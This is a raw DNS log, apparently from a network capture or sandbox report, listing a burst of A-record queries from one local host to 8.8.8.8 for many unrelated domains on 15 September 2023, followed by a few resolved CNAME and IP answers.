                                                                                                                                                                              Sep 15, 2023 07:28:25.781455040 CEST192.168.2.38.8.8.80x8adfStandard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.781517982 CEST192.168.2.38.8.8.80x39dcStandard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.782277107 CEST192.168.2.38.8.8.80x2a99Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:25.969382048 CEST192.168.2.38.8.8.80x2ca9Standard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:26.099437952 CEST192.168.2.38.8.8.80x8083Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:26.166416883 CEST192.168.2.38.8.8.80xc4b0Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:26.464468956 CEST192.168.2.38.8.8.80xb912Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:26.481123924 CEST192.168.2.38.8.8.80x956dStandard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:26.823999882 CEST192.168.2.38.8.8.80xe427Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:26.964554071 CEST192.168.2.38.8.8.80xff88Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.104114056 CEST192.168.2.38.8.8.80xe29Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.104114056 CEST192.168.2.38.8.8.80x8419Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.105087042 CEST192.168.2.38.8.8.80x2bc9Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.401628017 CEST192.168.2.38.8.8.80x782Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.402375937 CEST192.168.2.38.8.8.80xa6a3Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.541380882 CEST192.168.2.38.8.8.80x42aaStandard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.605063915 CEST192.168.2.38.8.8.80xec21Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.775798082 CEST192.168.2.38.8.8.80x3049Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.822823048 CEST192.168.2.38.8.8.80x1cbeStandard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:27.917799950 CEST192.168.2.38.8.8.80xa000Standard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.135380983 CEST192.168.2.38.8.8.80x2e39Standard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.275693893 CEST192.168.2.38.8.8.80x71caStandard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.275693893 CEST192.168.2.38.8.8.80x7e24Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.276554108 CEST192.168.2.38.8.8.80x749Standard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.369338989 CEST192.168.2.38.8.8.80x7d18Standard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.371233940 CEST192.168.2.38.8.8.80xe4d1Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.372179031 CEST192.168.2.38.8.8.80xbd87Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.373652935 CEST192.168.2.38.8.8.80xfbf4Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.651391029 CEST192.168.2.38.8.8.80x42aaStandard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.869184971 CEST192.168.2.38.8.8.80xec21Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:28.948198080 CEST192.168.2.38.8.8.80xc539Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:29.041668892 CEST192.168.2.38.8.8.80xb08bStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:29.260802031 CEST192.168.2.38.8.8.80x27e7Standard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:29.480365038 CEST192.168.2.38.8.8.80x24f2Standard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:29.573740959 CEST192.168.2.38.8.8.80xa6e9Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:29.695478916 CEST192.168.2.38.8.8.80x3396Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:29.696614027 CEST192.168.2.38.8.8.80x3d8dStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:29.965418100 CEST192.168.2.38.8.8.80xe0aStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.041043043 CEST192.168.2.38.8.8.80xec21Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.205789089 CEST192.168.2.38.8.8.80xb63eStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.206898928 CEST192.168.2.38.8.8.80x77edStandard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.257050037 CEST192.168.2.38.8.8.80xb278Standard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.338495016 CEST192.168.2.38.8.8.80xd5ffStandard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.775676012 CEST192.168.2.38.8.8.80xe1c1Standard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.790736914 CEST192.168.2.38.8.8.80x713bStandard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.791153908 CEST192.168.2.38.8.8.80x259aStandard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.838601112 CEST192.168.2.38.8.8.80x4949Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.839220047 CEST192.168.2.38.8.8.80xfbb5Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:30.840383053 CEST192.168.2.38.8.8.80xc2b8Standard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.022125006 CEST192.168.2.38.8.8.80x8728Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.072438002 CEST192.168.2.38.8.8.80xf32aStandard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.073312044 CEST192.168.2.38.8.8.80xe360Standard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.251602888 CEST192.168.2.38.8.8.80xc067Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.260734081 CEST192.168.2.38.8.8.80xc9daStandard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.275593042 CEST192.168.2.38.8.8.80xe71eStandard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.516365051 CEST192.168.2.38.8.8.80x2318Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.525474072 CEST192.168.2.38.8.8.80x1fafStandard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.713738918 CEST192.168.2.38.8.8.80x5cdbStandard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.837054014 CEST192.168.2.38.8.8.80xa605Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.837904930 CEST192.168.2.38.8.8.80x9d57Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.901503086 CEST192.168.2.38.8.8.80x687aStandard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:31.903600931 CEST192.168.2.38.8.8.80x1ad6Standard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.041902065 CEST192.168.2.38.8.8.80xd994Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.044891119 CEST192.168.2.38.8.8.80xff3Standard query (0)beafin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.056154013 CEST192.168.2.38.8.8.80xec21Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.123611927 CEST192.168.2.38.8.8.80x56dfStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.158813000 CEST192.168.2.38.8.8.80x45bStandard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.159609079 CEST192.168.2.38.8.8.80x73b5Standard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.160222054 CEST192.168.2.38.8.8.80x6187Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.309068918 CEST192.168.2.38.8.8.80x2c97Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.339035988 CEST192.168.2.38.8.8.80xfef2Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.452372074 CEST192.168.2.38.8.8.80x1087Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.517462969 CEST192.168.2.38.8.8.80x9c8Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.633073092 CEST192.168.2.38.8.8.80xf371Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.733347893 CEST192.168.2.38.8.8.80xa44aStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.734539032 CEST192.168.2.38.8.8.80xd71cStandard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:32.978698015 CEST192.168.2.38.8.8.80x6163Standard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.073779106 CEST192.168.2.38.8.8.80x80dbStandard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.073779106 CEST192.168.2.38.8.8.80x1c1eStandard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.074702024 CEST192.168.2.38.8.8.80xf823Standard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.282821894 CEST192.168.2.38.8.8.80xda33Standard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.541371107 CEST192.168.2.38.8.8.80x7859Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.572458982 CEST192.168.2.38.8.8.80x6e75Standard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.624363899 CEST192.168.2.38.8.8.80xfef2Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.727135897 CEST192.168.2.38.8.8.80x9420Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.882030964 CEST192.168.2.38.8.8.80x34deStandard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.884843111 CEST192.168.2.38.8.8.80x3edaStandard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:33.981750011 CEST192.168.2.38.8.8.80x78b4Standard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:34.072505951 CEST192.168.2.38.8.8.80x4614Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:34.089936018 CEST192.168.2.38.8.8.80x591eStandard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:34.139658928 CEST192.168.2.38.8.8.80x2ef5Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:34.182301998 CEST192.168.2.38.8.8.80xe5f2Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:34.460077047 CEST192.168.2.38.8.8.80xbabdStandard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:34.476087093 CEST192.168.2.38.8.8.80xb654Standard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:34.896573067 CEST192.168.2.38.8.8.80xfef2Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:34.972074986 CEST192.168.2.38.8.8.80x404eStandard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:35.375931978 CEST192.168.2.38.8.8.80x4614Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:35.429059982 CEST192.168.2.38.8.8.80x63b9Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:35.851090908 CEST192.168.2.38.8.8.80x44a9Standard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:35.887789011 CEST192.168.2.38.8.8.80x822dStandard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:35.947485924 CEST192.168.2.38.8.8.80xd05aStandard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:36.276062965 CEST192.168.2.38.8.8.80xbbe8Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:36.348073006 CEST192.168.2.38.8.8.80x404eStandard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:36.436070919 CEST192.168.2.38.8.8.80x8e6Standard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.112195015 CEST192.168.2.38.8.8.80xdf20Standard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.120975971 CEST192.168.2.38.8.8.80xf4eeStandard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.212064028 CEST192.168.2.38.8.8.80xfef2Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.464282036 CEST192.168.2.38.8.8.80x1468Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.464448929 CEST192.168.2.38.8.8.80xb465Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.464673042 CEST192.168.2.38.8.8.80xc13Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.464976072 CEST192.168.2.38.8.8.80xd39fStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.465023994 CEST192.168.2.38.8.8.80x82f2Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.524877071 CEST192.168.2.38.8.8.80x7cf0Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.525379896 CEST192.168.2.38.8.8.80xf171Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.526418924 CEST192.168.2.38.8.8.80x591bStandard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.526678085 CEST192.168.2.38.8.8.80xdff7Standard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.526926041 CEST192.168.2.38.8.8.80x9a2Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.527179003 CEST192.168.2.38.8.8.80x2901Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.527422905 CEST192.168.2.38.8.8.80x3c13Standard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.608057976 CEST192.168.2.38.8.8.80x2804Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.619231939 CEST192.168.2.38.8.8.80x2ed1Standard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.667483091 CEST192.168.2.38.8.8.80x3b8dStandard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.667843103 CEST192.168.2.38.8.8.80xbeb9Standard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.668031931 CEST192.168.2.38.8.8.80x811dStandard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.668454885 CEST192.168.2.38.8.8.80x23c8Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.668539047 CEST192.168.2.38.8.8.80xb51eStandard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.668909073 CEST192.168.2.38.8.8.80xa867Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.697648048 CEST192.168.2.38.8.8.80xa557Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.709162951 CEST192.168.2.38.8.8.80xcb81Standard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.723021984 CEST192.168.2.38.8.8.80x7bf2Standard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.807295084 CEST192.168.2.38.8.8.80xc379Standard query (0)gujarat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.807652950 CEST192.168.2.38.8.8.80xe8abStandard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:37.856520891 CEST192.168.2.38.8.8.80xa38fStandard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.127470016 CEST192.168.2.38.8.8.80x260cStandard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.233674049 CEST192.168.2.38.8.8.80xe588Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.240418911 CEST192.168.2.38.8.8.80x9aafStandard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.505552053 CEST192.168.2.38.8.8.80xd39fStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.544081926 CEST192.168.2.38.8.8.80xab19Standard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.588619947 CEST192.168.2.38.8.8.80x6fd6Standard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.620151997 CEST192.168.2.38.8.8.80x7f63Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.806497097 CEST192.168.2.38.8.8.80x9636Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:38.939035892 CEST192.168.2.38.8.8.80x2ed1Standard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.166544914 CEST192.168.2.38.8.8.80x604cStandard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.246984959 CEST192.168.2.38.8.8.80x80e3Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.393168926 CEST192.168.2.38.8.8.80xd567Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.394932985 CEST192.168.2.38.8.8.80x3ac2Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.395104885 CEST192.168.2.38.8.8.80x2639Standard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.492427111 CEST192.168.2.38.8.8.80x9ec3Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.493638992 CEST192.168.2.38.8.8.80xd39fStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.591165066 CEST192.168.2.38.8.8.80x30a6Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:39.637456894 CEST192.168.2.38.8.8.80xc992Standard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:40.559474945 CEST192.168.2.38.8.8.80x92d0Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:40.762269974 CEST192.168.2.38.8.8.80x17d2Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:40.824599981 CEST192.168.2.38.8.8.80x89a5Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:40.903150082 CEST192.168.2.38.8.8.80xa875Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:40.997416019 CEST192.168.2.38.8.8.80xef04Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:41.097450972 CEST192.168.2.38.8.8.80xa5f1Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:41.196187973 CEST192.168.2.38.8.8.80xbcafStandard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:41.388017893 CEST192.168.2.38.8.8.80xb7ccStandard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                              Sep 15, 2023 07:26:03.956434965 CEST8.8.8.8192.168.2.30xf493No error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.956434965 CEST8.8.8.8192.168.2.30xf493No error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.957967043 CEST8.8.8.8192.168.2.30x9bcdNo error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.957967043 CEST8.8.8.8192.168.2.30x9bcdNo error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.960534096 CEST8.8.8.8192.168.2.30x78daNo error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.960534096 CEST8.8.8.8192.168.2.30x78daNo error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.963242054 CEST8.8.8.8192.168.2.30x5d6dNo error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.963242054 CEST8.8.8.8192.168.2.30x5d6dNo error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.963865995 CEST8.8.8.8192.168.2.30x12f6No error (0)www.ftchat.com172.67.140.52A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.963865995 CEST8.8.8.8192.168.2.30x12f6No error (0)www.ftchat.com104.21.46.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.965652943 CEST8.8.8.8192.168.2.30x669eNo error (0)www.pdqhomes.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.965652943 CEST8.8.8.8192.168.2.30x669eNo error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.965652943 CEST8.8.8.8192.168.2.30x669eNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:03.965652943 CEST8.8.8.8192.168.2.30x669eNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.074426889 CEST8.8.8.8192.168.2.30xb0cfNo error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.106286049 CEST8.8.8.8192.168.2.30xb20fNo error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.151201010 CEST8.8.8.8192.168.2.30xf028No error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.151201010 CEST8.8.8.8192.168.2.30xf028No error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.393640041 CEST8.8.8.8192.168.2.30xd214No error (0)www.alteor.clcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.393640041 CEST8.8.8.8192.168.2.30xd214No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.393640041 CEST8.8.8.8192.168.2.30xd214No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.612757921 CEST8.8.8.8192.168.2.30xe00cNo error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:26:04.612757921 CEST8.8.8.8192.168.2.30xe00cNo error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
